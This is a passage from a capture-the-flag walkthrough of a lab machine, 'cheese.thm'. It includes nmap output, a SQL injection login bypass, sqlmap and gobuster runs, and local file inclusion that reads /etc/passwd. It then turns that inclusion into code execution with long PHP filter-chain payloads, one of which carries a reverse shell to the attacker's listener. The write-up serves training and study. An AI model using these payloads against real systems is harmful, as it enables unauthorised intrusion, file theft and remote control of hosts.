SF:\x205qRocCzvX/\n")%r(RTSPRequest,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff
SF:\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(RPCCheck,25,"\xff\xfb\x03\x
SF:ff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(DNSVers
SF:ionBindReqTCP,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFront
SF:Door\x205qRocCzvX/\n")%r(DNSStatusRequestTCP,25,"\xff\xfb\x03\xff\xfb0\
SF:xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(Help,25,"\xff\x
SF:fb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r
SF:(TerminalServerCookie,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\
SF:r\rFrontDoor\x205qRocCzvX/\n")%r(Kerberos,25,"\xff\xfb\x03\xff\xfb0\xff
SF:\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SMBProgNeg,25,"\xf
SF:f\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n"
SF:)%r(X11Probe,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontD
SF:oor\x205qRocCzvX/\n")%r(FourOhFourRequest,25,"\xff\xfb\x03\xff\xfb0\xff
SF:\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(LPDString,25,"\xff
SF:\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")
SF:%r(LDAPSearchReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFr
SF:ontDoor\x205qRocCzvX/\n")%r(LDAPBindReq,25,"\xff\xfb\x03\xff\xfb0\xff\x
SF:fb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SIPOptions,25,"\xff\
SF:xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%
SF:r(LANDesk-RC,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontD
SF:oor\x205qRocCzvX/\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1723-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r
SF:(NULL,A,"\x01\x0400000\rD\n")%r(GenericLines,A,"\x01\x0400000\rD\n")%r(
SF:GetRequest,A,"\x01\x0400000\rD\n")%r(HTTPOptions,A,"\x01\x0400000\rD\n"
SF:)%r(RTSPRequest,A,"\x01\x0400000\rD\n")%r(RPCCheck,A,"\x01\x0400000\rD\
SF:n")%r(DNSVersionBindReqTCP,A,"\x01\x0400000\rD\n")%r(DNSStatusRequestTC
SF:P,A,"\x01\x0400000\rD\n")%r(Help,A,"\x01\x0400000\rD\n")%r(SSLSessionRe
SF:q,A,"\x01\x0400000\rD\n")%r(TerminalServerCookie,A,"\x01\x0400000\rD\n"
SF:)%r(TLSSessionReq,A,"\x01\x0400000\rD\n")%r(Kerberos,A,"\x01\x0400000\r
SF:D\n")%r(SMBProgNeg,A,"\x01\x0400000\rD\n")%r(X11Probe,A,"\x01\x0400000\
SF:rD\n")%r(FourOhFourRequest,A,"\x01\x0400000\rD\n")%r(LPDString,A,"\x01\
SF:x0400000\rD\n")%r(LDAPSearchReq,A,"\x01\x0400000\rD\n")%r(LDAPBindReq,A
SF:,"\x01\x0400000\rD\n")%r(SIPOptions,A,"\x01\x0400000\rD\n")%r(LANDesk-R
SF:C,A,"\x01\x0400000\rD\n")%r(TerminalServer,A,"\x01\x0400000\rD\n")%r(NC
SF:P,A,"\x01\x0400000\rD\n")%r(NotesRPC,A,"\x01\x0400000\rD\n")%r(JavaRMI,
SF:A,"\x01\x0400000\rD\n")%r(WMSRequest,A,"\x01\x0400000\rD\n")%r(oracle-t
SF:ns,A,"\x01\x0400000\rD\n")%r(ms-sql-s,A,"\x01\x0400000\rD\n")%r(afp,A,"
SF:\x01\x0400000\rD\n")%r(giop,A,"\x01\x0400000\rD\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|VoIP phone|general purpose|WAP|proxy server|webcam
Running (JUST GUESSING): Google Android 4.4.X|4.0.X (90%), Cisco embedded (88%), Linux 3.X (88%), Linksys embedded (88%), WebSense embedded (88%), AXIS embedded (87%)
OS CPE: cpe:/o:google:android:4.4.0 cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:google:android:4.0.4
Aggressive OS guesses: Android 4.4.0 (90%), Cisco CP-DX80 collaboration endpoint (Android) (88%), Linux 3.6 - 3.10 (88%), Linksys EA3500 WAP (88%), Websense Content Gateway (88%), Axis M3006-V network camera (87%), Android 4.0.4 (Linux 2.6) (87%), Linux 2.6.18 - 2.6.24 (87%), Linux 3.16 (87%), Linux 4.4 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 37.274 days (since Fri Aug 30 12:10:58 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: qnBE-or, w; OS: Linux; Device: VoIP adapter; CPE: cpe:/o:linux:linux_kernel, cpe:/h:motorola:vt1000v

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   150.54 ms 10.11.0.1
2   150.60 ms cheese.thm (10.10.94.254)

By specifying a value of 20 for the --top-ports switch, Nmap scanned for the top 20 most commonly used ports. Let us start by checking out these web-related ports - 80, 8080.

Enumeration

Checking out port 8080

We get this command:

/bin/bash	-c	{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}	$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));

Let us decode the base64 content from it:

Command:

echo 'cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==' | base64 -d
print "PWNED\n" x 5 ; $_=`pwd`; print "\nuploading your home directory: ",$_,"... \n\n";

The command just decodes a base64 string to execute Perl code that prints PWNED five times, retrieves and prints the current working directory, and displays a message about uploading your home directory.

Nothing of interest here. Let us now move on to check out port 80.

Checking out port 80:

We can now check out the Login option.

The first approach to consider when coming across a login page like this is to check if it's vulnerable to SQL Injection.

Exploitation

Intercepting the Login request in Burp:

Testing for SQL Injection:

We can try a basic UNION command to determine the possible number of columns.

The payload that worked:

' UNION SELECT 1,2,3; -- -
'+UNION+SELECT+1,2,3%3b+--+-  //URL Encoded

This means we have 3 columns.

Upon sending this request we get a 302 status code in the response for a redirection.

Once Follow redirection is selected, we successfully get redirected to the Admin Panel:

As expected we indeed have 3 columns - Orders, Messages & Users.

The endpoint being /secret-script.php having a URL parameter named file, like so - /secret-script.php?file=

We may have a potential LFI (Local File Inclusion) vulnerability here. Before diving deeper, let's see if SQLMap can uncover any valuable information.

Running SQLMap:

The request file:

Command:

sqlmap -r request --dbs --dump --batch

It found the /secret-script.php endpoint.

And we also got a password hash for a user named comte. Attempting to crack this hash did not yield any results.

Also, the resource paths (orders.html, messages.html, users.html) could be fetched via directory busting:

Command:

gobuster dir -u http://cheese.thm/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html

The users.html path:

http://cheese.thm/users.html
http://cheese.thm/secret-script.php?file=php://filter/resource=users.html

The messages.html path:

http://cheese.thm/messages.html
http://cheese.thm/secret-script.php?file=php://filter/resource=messages.html

The orders.html path:

http://cheese.thm/orders.html
http://cheese.thm/secret-script.php?file=php://filter/resource=orders.html

Now let us get back to the possible LFI on the file parameter. As we have noticed any valid file that is present on the server gets fetched when passed as a value for that parameter. This can be abused to potentially read files sensitive files on the server.

Trying to read /etc/passwd file:

http://cheese.thm/secret-script.php?file=/etc/passwd
http://cheese.thm/secret-script.php?file=php://filter/resource=/etc/passwd

And we indeed have a successful LFI.

We now know that the comte user that we had come across before in the SQLMap output is a user on the machine. At this point, we have to find a way to convert the LFI that we currently have to a RCE (Remote Code Execution).

LFI to RCE:

The above method is what leads us to achieve RCE.

We can first try out the example shown to generate a phpinfo() chain.

Command:

python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

Now the payload that it generated has to be passed as a value for the file parameter:

http://cheese.thm/secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

We get the phpinfo() page. So we now have a successful RCE.

Foothold

Now we can use a PHP reverse shell as the chain in the command.

The IP specified in the payload is the tun0 interface IP.

Setting up a listener on port 443:

Command:

python3 php_filter_chain_generator.py --chain '<?php $sock=fsockopen("10.11.75.84",443);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>'

The reverse shell command is passed as an argument for the --chain switch by enclosing it within PHP tags.

http://cheese.thm/secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.ico